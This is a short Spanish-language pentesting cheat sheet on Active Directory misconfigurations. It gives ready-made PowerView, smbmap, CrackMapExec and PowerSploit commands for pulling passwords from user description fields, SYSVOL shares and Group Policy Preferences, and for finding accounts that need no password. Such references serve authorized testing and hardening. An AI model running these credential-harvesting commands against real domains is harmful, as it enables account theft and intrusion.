# Configuraciones incorrectas

## Información confidencial

### Campo descripción de los usuarios

```powershell
# PowerView
Get-DomainUser * | Select-Object SamAccountName, Description | Where-Object {$_.Description -ne $null}
Find-UserField -SearchField Description -SearchTerm "<search-pattern>"
```

### Recursos compartidos y scripts en SYSVOL

```shell
smbmap -H <IP-address-DC> -d <ACME.LOCAL> -u <user> -p <password>
smbmap -H <IP-address-DC> -d <ACME.LOCAL> -u <user> -p <password> -R "SYSVOL"
```

## Group Policy Preferences (GPP)

### CrackMapExec

```shell
crackmapexec smb <IP-address-DC> -u <user> -p <password> -M gpp_password
crackmapexec smb <IP-address-DC> -u <user> -p <password> -M gpp_autologin
```

### PowerSploit

```powershell
# Get-GPPPassword.ps1
Import-Module .\Get-GPPPassword.ps1
Get-GPPPassword
Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

# Get-GPPAutologon.ps1
Import-Module .\Get-GPPAutologon.ps1
Get-GPPAutologon
Get-GPPAutologon | ForEach-Object {$_.passwords} | Sort-Object -Uniq
```

## PASSWD\_NOTREQD

El usuario no está sujeto a la política de contraseñas, lo que significa que podría tener una contraseña más corta o ninguna contraseña (si se permiten contraseñas vacías en el dominio).

```powershell
# PowerView
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object SamAccountName, UserAccountControl
```
